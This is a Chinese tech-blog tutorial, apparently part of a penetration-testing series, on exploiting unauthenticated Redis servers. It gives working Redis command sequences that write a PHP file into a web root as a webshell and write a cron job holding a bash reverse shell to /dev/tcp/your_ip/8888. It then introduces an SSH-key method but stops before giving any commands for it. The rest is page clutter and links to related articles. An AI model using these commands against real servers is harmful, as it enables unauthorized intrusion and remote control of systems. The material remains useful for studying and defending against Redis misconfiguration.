【安全攻防知识-6】Redis和Jboss攻击

最新推荐文章于 2023-02-13 09:45:00 发布
最新推荐文章于 2023-02-13 09:45:00 发布
阅读量199 收藏
点赞数
分类专栏: WEB安全 内网渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26579613/article/details/124940162
版权

1、Redis

1.1 背景

在内网渗透中,设置为空口令或者弱口令的Redis大量存在,以此为跳板,或许能有收获。

Redis 是一个高性能的key-value数据库,Redis支持主从同步。数据可以从主服务器向任意数量的从服务器上同步,从服务器可以是关联其他从服务器的主服务器。简而言之,Redis可以提供高效率的数据查询服务。

1.2 漏洞利用思路

Redis本身漏洞较少,它主要存在的漏洞还是未授权访问漏洞,总共有三种主流的提权方式,这里分别进行讲解。

1.2.1 直接写getshell

# 设置文件路径,示例为网站根目录
config set dir /var/www/html/

# 设置备份文件名,即木马名称,可以通过http://target_ip/phpinfo.php访问
config set dbfilename phpinfo.php

# 向数据库插入payload
set payload "<?php phpinfo(); ?>"

# 保存数据库到备份文件(木马)
save

1.2.2 设置定时任务

何为定时任务,linux系统中,crontab程序允许你设置一个类似闹钟的程序,定时启动。

比如,某系统每日零点需要从另一个系统获取数据,或需要在凌晨对本身的数据库表进行按日分库分表,即可以通过定时任务实现。

1.设置文件名和路径(这个因系统不同而路径不同)
config set dir /var/spool/cron/crontabs
config set dbfilename timeAttack

2.插入定时任务
set payload "* * * * * bash -i >& /dev/tcp/your_ip/8888 0>&1"

3.保存
save

1.2.3 写ssh公钥

通过ssh方式登录linux系统,相信大家都不陌生。在ssh登录时,常常需要输入密码: 

如果向服务器写入自己的公钥,则可以免密进行ssh登录,该过程较为复杂,通过实践来帮助大家理解。

 

BridyWang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
服务攻防之中间件JBoss(上)
技术超强的网络安全平台
12-06 155
系列文章专辑:渗透测试之地基篇简介渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!一、前言中间件是介于应用系统和系统软件之间的一类
SSRF漏洞原理和实验
gl620321的博客
06-02 4126
一.SSRF概述 SSRF(Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据 数据流:攻击者----->服务器---->目标地址 根据后台使用的函数的不同,对应的影响和利用方...
redis未授权访问漏洞学习
smile_chance的博客
07-09 1040
redis未授权访问
Redis默认空口令未授权访问
well_done_的博客
12-02 2882
前几天接到总部的电话说是要我配合他们信息安全部门调查一下我们这边一台中了挖矿病毒的主机,总部大佬远程过来一顿操作发现是通过redis进来的,redis因为默认设置是没有密码的,如果主机是用root身份运行的redis,就可以直接写入ssh密钥来登录到主机。大佬操作完之后,我模拟了一下环境,和大家分享一下攻击过程。 一、测试环境 测试对象 IP 靶机(centos7) 19...
深入浅出带你学习JBoss中间件常见漏洞
Spontaneous_0的博客
02-13 1039
深入浅出带你学习JBoss中间件常见漏洞
flink-connector-redis-2.10-1.1.5-API文档-中文版.zip
07-14
赠送jar包:flink-connector-redis_2.10-1.1.5.jar; 赠送原API文档:flink-connector-redis_2.10-1.1.5-javadoc.jar; 赠送源代码:flink-connector-redis_2.10-1.1.5-sources.jar; 赠送Maven依赖信息文件:flink-...
redis_rate:go-redis的速率限制
05-13
go-redis的速率限制 :red_heart: 该软件包基于并实现了基于Redis的速率限制的 (又名泄漏桶)。 该代码需要Redis 3.2或更高版本,因为它依赖于功能。安装redis_rate支持2个最新的Go版本,并且需要具有支持的Go版本。...
resty-redis-cluster:Redis集群的Openresty lua客户端
02-03
resty-redis-cluster:Redis集群的Openresty lua客户端
Docker-Compose--RedisRedis DockerFile
02-10
Docker构建Nginx的传播詹金斯雷迪斯
docker-compose redis主从哨兵 redis多节点高可用 redis集群高可用
04-12
docker-compose 形式部署 redis 1主2从3哨兵 redis 多节点高可用 redis 主从哨兵 redis 集群高可用 redis 哨兵 redis 高可用
JBoss漏洞
公众号shadow sock7
05-26 452
CVE-2017-12149 /invoker/JMXInvokerServlet 反序列化 In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for whi
慢速连接攻击
qinyushuang的专栏
01-29 2万+
提起攻击,第一反应就是海量的流量、海量的报文。但有一种攻击却反其道而行之,以慢著称,以至于有些攻击目标被打死了都不知道是怎么死的,这就是慢速连接攻击。 slowhttptest是一款对服务器进行慢攻击的测试软件,包含了几种攻击方式,像Slowloris、SlowHTTP POST、Slow Read attack等。 总而言之,该工具的原理就是设法让服务器等待,当服务器在保持连接等待时,就消耗
针对JBOSS访问缓慢做的一些优化
hanyingzhong的专栏
04-13 2270
针对JBOSS访问缓慢做的一些优化  针对JBOSS访问缓慢做的一些优化 2009-05-27 13:10:30 标签:linux 优化 jboss 休闲 缓慢 原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://kerry.blog.51cto.com/172631/161179      JBOSS
redis配置认证密码
热门推荐
刀刀的专栏
12-30 36万+
redis配置密码 1.通过配置文件进行配置 yum方式安装的redis配置文件通常在/etc/redis.conf中,打开配置文件找到 #requirepass foobared去掉行前的注释,并修改密码为所需的密码,保存文件 requirepass myRedis重启redis sudo service redis restart #或者 sudo service redis s
JBoss漏洞总结
qq1325928591的博客
12-28 4003
近期遇到一次考核,两题都是关于jboss的相关漏洞,虽然都复现过,毕竟脑子有限,还是进行总结一下 jboss一般有2种类型的的漏洞: a.访问控制不严导致的漏洞 b.反序列化漏洞 Jboss管理控制台说明 jboss 4.x 及其之前的版本 console 管理路径为 /jmx-console/ 和 /web-console/ jmx-console的配置文件为: /opt/jboss/jboss4/server/default/deploy/jmx-console.war/WEB-INF/jboss-w
Jboss漏洞利用
u011215939的博客
01-23 8026
所需工具:kallinux,jexboss,ZoomEye; JBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的,导致了它很很复杂,同时也使它易成为攻击者的目标。为了更好的利用这个漏洞,我直接使用一个自动化获取shell的工具:jexboss。 1
redis密码管理
lxpbs8851的专栏
11-01 9万+
一. 如何初始化redis的密码? 总共2个步骤: a.在配置文件中有个参数: requirepass  这个就是配置redis访问密码的参数。 比如 requirepass test123 b.配置文件中参数生效需要重启重启redis 。   二.不重启redis如何配置密码? a. 在配置文件中配置requirepass的密码(当redis重启时密码依然有效)。 # requi
为什么引入的spring-data-redis和spring-boot-starter-data-redis不一致
最新发布
06-03
`spring-data-redis`和`spring-boot-starter-data-redis`都是Spring Framework中用于支持Redis的模块。其中,`spring-boot-starter-data-redis`是Spring Boot中对`spring-data-redis`的封装和集成,它包含了`spring-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值